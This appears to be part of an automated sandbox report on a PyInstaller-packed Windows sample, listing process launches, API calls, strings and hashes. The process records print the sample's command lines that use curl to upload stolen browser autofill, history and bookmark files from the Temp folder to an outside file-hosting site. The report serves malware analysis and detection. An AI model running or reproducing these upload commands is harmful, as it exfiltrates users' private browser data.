Commandline:	C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile"
Imagebase:	0x7ff68dd20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 4508, Parent PID: 4932

General

Target ID:	42
Start time:	02:45:29
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	02:45:29
Start date:	13/12/2024
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl -F "file=@C:\Users\user\AppData\Local\Temp\crautofills.txt" https://store4.gofile.io/uploadFile
Imagebase:	0x7ff680420000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	02:45:29
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile"
Imagebase:	0x7ff68dd20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 5804, Parent PID: 7668

General

Target ID:	45
Start time:	02:45:29
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	02:45:29
Start date:	13/12/2024
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl -F "file=@C:\Users\user\AppData\Local\Temp\crhistories.txt" https://store4.gofile.io/uploadFile
Imagebase:	0x7ff680420000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	02:45:29
Start date:	13/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile"
Imagebase:	0x7ff68dd20000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 7876, Parent PID: 4864

General

Target ID:	48
Start time:	02:45:29
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	02:45:29
Start date:	13/12/2024
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl -F "file=@C:\Users\user\AppData\Local\Temp\crbookmarks.txt" https://store4.gofile.io/uploadFile
Imagebase:	0x7ff680420000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	19.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	43

Executed Functions

Function 00007FF666DD8BD0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257
synchronizationwindowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF666DD9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF666DD45E4,00000000,00007FF666DD1985), ref: 00007FF666DD9439

SetConsoleCtrlHandler.KERNEL32(?,?,FFFFFFFF,00007FF666DD3F7F), ref: 00007FF666DD8C2B
GetStartupInfoW.KERNEL32(?,FFFFFFFF,00007FF666DD3F7F), ref: 00007FF666DD8C46

Part of subcall function 00007FF666DEA4EC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF666DEA500

Part of subcall function 00007FF666DE878C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF666DE87F3

GetCommandLineW.KERNEL32(?,FFFFFFFF,00007FF666DD3F7F), ref: 00007FF666DD8CD6
CreateProcessW.KERNELBASE ref: 00007FF666DD8D0E
GetLastError.KERNEL32(?,FFFFFFFF,00007FF666DD3F7F), ref: 00007FF666DD8D18

Part of subcall function 00007FF666DD2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF666DD3706,?,00007FF666DD3804), ref: 00007FF666DD2C9E
Part of subcall function 00007FF666DD2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF666DD3706,?,00007FF666DD3804), ref: 00007FF666DD2D63
Part of subcall function 00007FF666DD2C50: MessageBoxW.USER32 ref: 00007FF666DD2D99

RegisterClassW.USER32 ref: 00007FF666DD8D70
GetLastError.KERNEL32(?,FFFFFFFF,00007FF666DD3F7F), ref: 00007FF666DD8D7B
CreateWindowExW.USER32 ref: 00007FF666DD8DC5
GetLastError.KERNEL32(?,FFFFFFFF,00007FF666DD3F7F), ref: 00007FF666DD8DD7
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF666DD3F7F), ref: 00007FF666DD8DF2
GetLastError.KERNEL32(?,FFFFFFFF,00007FF666DD3F7F), ref: 00007FF666DD8E05
PeekMessageW.USER32 ref: 00007FF666DD8E29
TranslateMessage.USER32 ref: 00007FF666DD8E37
DispatchMessageW.USER32(?,FFFFFFFF,00007FF666DD3F7F), ref: 00007FF666DD8E41
PeekMessageW.USER32 ref: 00007FF666DD8E5C
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF666DD3F7F), ref: 00007FF666DD8E6E
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF666DD3F7F), ref: 00007FF666DD8E89
TerminateProcess.KERNEL32(?,FFFFFFFF,00007FF666DD3F7F), ref: 00007FF666DD8E9F
GetLastError.KERNEL32(?,FFFFFFFF,00007FF666DD3F7F), ref: 00007FF666DD8EA9
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF666DD3F7F), ref: 00007FF666DD8EB7
DestroyWindow.USER32(?,FFFFFFFF,00007FF666DD3F7F), ref: 00007FF666DD8FF4
GetExitCodeProcess.KERNELBASE ref: 00007FF666DD9009
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF666DD3F7F), ref: 00007FF666DD9012
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF666DD3F7F), ref: 00007FF666DD901F

Strings

CreateProcessW, xrefs: 00007FF666DD8D27
PyInstaller Onefile Hidden Window, xrefs: 00007FF666DD8D85
Failed to create child process!, xrefs: 00007FF666DD8D20
PyInstallerOnefileHiddenWindow, xrefs: 00007FF666DD8D44

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
API String ID: 3832162212-3165540532
Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
Instruction ID: 3f6cc778b0c5ec06e7200bf10d7e6b532c5dd1b7b2e65dd7980d8f834fc02e5f
Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
Instruction Fuzzy Hash: BAD15C32A08A82D6EB109F74F8542A977B4FB84B58F445335DA5D8EAA8DF3ED5448F00

Function 00007FF666DD1000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 509
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

pyi-disable-windowed-traceback, xrefs: 00007FF666DD3BB2
MEI, xrefs: 00007FF666DD3933
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF666DD3D12
PYINSTALLER_SUPPRESS_SPLASH_SCREEN, xrefs: 00007FF666DD3E0A
PYINSTALLER_RESET_ENVIRONMENT, xrefs: 00007FF666DD3882, 00007FF666DD38AF
Failed to load splash screen resources!, xrefs: 00007FF666DD3E85
pkg, xrefs: 00007FF666DD39BE
_PYI_SPLASH_IPC, xrefs: 00007FF666DD3A23, 00007FF666DD3EF5
pyi-python-flag, xrefs: 00007FF666DD3AD6
_PYI_PARENT_PROCESS_LEVEL, xrefs: 00007FF666DD3A17, 00007FF666DD3A2F, 00007FF666DD3A9B
Failed to convert DLL search path!, xrefs: 00007FF666DD3DDC
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF666DD3BE8
Failed to remove temporary directory: %s, xrefs: 00007FF666DD3FC3
Py_GIL_DISABLED, xrefs: 00007FF666DD3AF4
Could not create temporary directory!, xrefs: 00007FF666DD3CBF
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF666DD3971
Failed to start splash screen!, xrefs: 00007FF666DD3ED4
Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s, xrefs: 00007FF666DD3B32
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF666DD39DE
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF666DD3C61
_PYI_APPLICATION_HOME_DIR not set for onefile child process!, xrefs: 00007FF666DD3D35
pyi-contents-directory, xrefs: 00007FF666DD3B8D
_PYI_APPLICATION_HOME_DIR, xrefs: 00007FF666DD3A0B, 00007FF666DD3CD4, 00007FF666DD3F6B
VCRUNTIME140.dll, xrefs: 00007FF666DD3DB1
_PYI_ARCHIVE_FILE, xrefs: 00007FF666DD38D2, 00007FF666DD39FF
Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF666DD3EBB
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF666DD3EA6
pyi-runtime-tmpdir, xrefs: 00007FF666DD3B68

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag$pyi-runtime-tmpdir
API String ID: 2776309574-4232158417
Opcode ID: b3b5a56992daf9903ed9efec52e2e31294b1e992dc7436ca3323256ab31d685a
Instruction ID: d16882f22927bd9a450985dfd920e7344504ea5d382338fe6f3a087974ef6fc1
Opcode Fuzzy Hash: b3b5a56992daf9903ed9efec52e2e31294b1e992dc7436ca3323256ab31d685a
Instruction Fuzzy Hash: D6328D21A0C682D1FB25AB25F4543B96271AF85784F454232DA5DCF2D6EF3EE958CF00

Function 00007FF666DF5C70 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF666DF5CB5

Part of subcall function 00007FF666DF5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF666DF561C

Part of subcall function 00007FF666DEA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF666DF2D92,?,?,?,00007FF666DF2DCF,?,?,00000000,00007FF666DF3295,?,?,?,00007FF666DF31C7), ref: 00007FF666DEA9CE
Part of subcall function 00007FF666DEA9B8: GetLastError.KERNEL32(?,?,?,00007FF666DF2D92,?,?,?,00007FF666DF2DCF,?,?,00000000,00007FF666DF3295,?,?,?,00007FF666DF31C7), ref: 00007FF666DEA9D8

Part of subcall function 00007FF666DEA970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF666DEA94F,?,?,?,?,?,00007FF666DEA83A), ref: 00007FF666DEA979
Part of subcall function 00007FF666DEA970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF666DEA94F,?,?,?,?,?,00007FF666DEA83A), ref: 00007FF666DEA99E

_get_daylight.LIBCMT ref: 00007FF666DF5CA4

Part of subcall function 00007FF666DF5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF666DF567C

_get_daylight.LIBCMT ref: 00007FF666DF5F1A
_get_daylight.LIBCMT ref: 00007FF666DF5F2B
_get_daylight.LIBCMT ref: 00007FF666DF5F3C
GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF666DF617C), ref: 00007FF666DF5F63

Strings

Eastern Summer Time, xrefs: 00007FF666DF6021
Eastern Standard Time, xrefs: 00007FF666DF6009

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 4070488512-239921721
Opcode ID: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
Instruction ID: caa80ad4b942c55ff58ab66193bf82805f83becb7eb16d2d49b561ffb7aa74a2
Opcode Fuzzy Hash: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
Instruction Fuzzy Hash: F6D1A136A08242C6E720AF26E8511B96771EFD4794F858236EA4DCFB95DF3EE441CB40

Function 00007FF666DF69D4 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF666DF6708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF666DF6749
Part of subcall function 00007FF666DF6708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF666DF67C7
Part of subcall function 00007FF666DF6708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF666DF6818

CreateFileW.KERNELBASE ref: 00007FF666DF6ADA
CreateFileW.KERNEL32 ref: 00007FF666DF6B2A
GetLastError.KERNEL32 ref: 00007FF666DF6B5A
GetFileType.KERNELBASE ref: 00007FF666DF6B6F
GetLastError.KERNEL32 ref: 00007FF666DF6B79
CloseHandle.KERNEL32 ref: 00007FF666DF6BAC
CloseHandle.KERNEL32 ref: 00007FF666DF6D0F
CreateFileW.KERNEL32 ref: 00007FF666DF6D44
GetLastError.KERNEL32 ref: 00007FF666DF6D53

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
Instruction ID: ca2d59e845b961d7438fb55b00caa1e7b82bf8f2e99bf483bee3689d72f42772
Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
Instruction Fuzzy Hash: AEC1AE36B28A82C5EB10CF65E4906AC3771E789B98B015335EA2E9F7D5DF3AD451CB00

Function 00007FF666DD83B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,00007FF666DD8B09,00007FF666DD3FA5), ref: 00007FF666DD841B
RemoveDirectoryW.KERNEL32(?,00007FF666DD8B09,00007FF666DD3FA5), ref: 00007FF666DD849E
DeleteFileW.KERNELBASE(?,00007FF666DD8B09,00007FF666DD3FA5), ref: 00007FF666DD84BD
FindNextFileW.KERNELBASE(?,00007FF666DD8B09,00007FF666DD3FA5), ref: 00007FF666DD84CB
FindClose.KERNEL32(?,00007FF666DD8B09,00007FF666DD3FA5), ref: 00007FF666DD84DC
RemoveDirectoryW.KERNELBASE(?,00007FF666DD8B09,00007FF666DD3FA5), ref: 00007FF666DD84E5

Strings

%s\*, xrefs: 00007FF666DD83E2

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 39a93d91a788addd72801eeb202cf5dd5373a6ceabdc1da620128e14205563d9
Instruction ID: b60b26cdc1c72332c35724a4e531deacc59d433dbc29a458f23ac94cc40ab52b
Opcode Fuzzy Hash: 39a93d91a788addd72801eeb202cf5dd5373a6ceabdc1da620128e14205563d9
Instruction Fuzzy Hash: 5F417121A0CA42D5EA21AB24F8545B96375FB98B54F801332D99DCF6D4DF3EE54A8F00

Function 00007FF666DF5EEC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF666DF5F1A

Part of subcall function 00007FF666DF5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF666DF567C

_get_daylight.LIBCMT ref: 00007FF666DF5F2B

Part of subcall function 00007FF666DF5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF666DF561C

_get_daylight.LIBCMT ref: 00007FF666DF5F3C

Part of subcall function 00007FF666DF5638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF666DF564C

Part of subcall function 00007FF666DEA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF666DF2D92,?,?,?,00007FF666DF2DCF,?,?,00000000,00007FF666DF3295,?,?,?,00007FF666DF31C7), ref: 00007FF666DEA9CE
Part of subcall function 00007FF666DEA9B8: GetLastError.KERNEL32(?,?,?,00007FF666DF2D92,?,?,?,00007FF666DF2DCF,?,?,00000000,00007FF666DF3295,?,?,?,00007FF666DF31C7), ref: 00007FF666DEA9D8

GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF666DF617C), ref: 00007FF666DF5F63

Strings

Eastern Summer Time, xrefs: 00007FF666DF6021
Eastern Standard Time, xrefs: 00007FF666DF6009

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 3458911817-239921721
Opcode ID: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
Instruction ID: b77e554931e22994dd6d2786cf740e819c6432942661d719c98297f51a1da374
Opcode Fuzzy Hash: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
Instruction Fuzzy Hash: 88514632A18682C6E710DF22F891579A770BB98784F458235EA5DCFB96DF3EE4418F40

Function 00007FF666DD92F0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNELBASE ref: 00007FF666DD9323
FindClose.KERNELBASE ref: 00007FF666DD9332

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
Instruction ID: 22fbc95af66d89bf5490f7fd657f2a71cb0aeb8b4be1730e805e247d5598c7a3
Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
Instruction Fuzzy Hash: 63F04462A18741C6F7A09B60F4597667360AB88774F040335DA6D4E6D4DF3DE0598F00

Function 00007FF666DF0938 Relevance: 2.0, APIs: 1, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

Associated: 00000000.00000002.1898246791.00007FF666DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898336639.00007FF666DFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E0E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898379632.00007FF666E12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1898453875.00007FF666E19000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff666dd0000_chos.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor
String ID:
API String ID: 1010374628-0
Opcode ID: 10bf4b1f0472125ada9b1d6b923a92a2d49e498fcbab652d34985a7b27debbff
Instruction ID: dacc42f8f68e8407ea7449bfcac1289a66f8550c43a7ea548a7316ca30de01ea
Opcode Fuzzy Hash: 10bf4b1f0472125ada9b1d6b923a92a2d49e498fcbab652d34985a7b27debbff
Instruction Fuzzy Hash: EB02C021A1D683C5FA61AB15B82027966B0AF85BE0F898735ED5DCF3D1DE3FA4418B40

Function 00007FF666DD1950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF666DD7F80: _fread_nolock.LIBCMT ref: 00007FF666DD802A

_fread_nolock.LIBCMT ref: 00007FF666DD1A1B

Part of subcall function 00007FF666DD2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF666DD1B6A), ref: 00007FF666DD295E

Strings

calloc, xrefs: 00007FF666DD1A68
fseek, xrefs: 00007FF666DD19F5
Could not allocate buffer for TOC!, xrefs: 00007FF666DD1B1B
MEI, xrefs: 00007FF666DD1991
fread, xrefs: 00007FF666DD1A32, 00007FF666DD1B5C
Could not allocate memory for archive structure!, xrefs: 00007FF666DD1A61
malloc, xrefs: 00007FF666DD1B22
Could not read full TOC!, xrefs: 00007FF666DD1B55
Error on file., xrefs: 00007FF666DD1B8D
Failed to seek to cookie position!, xrefs: 00007FF666DD19EE
Failed to read cookie!, xrefs: 00007FF666DD1A2B

Memory Dump Source

Source File: 00000000.00000002.1898286649.00007FF666DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF666DD0000, based on PE: true

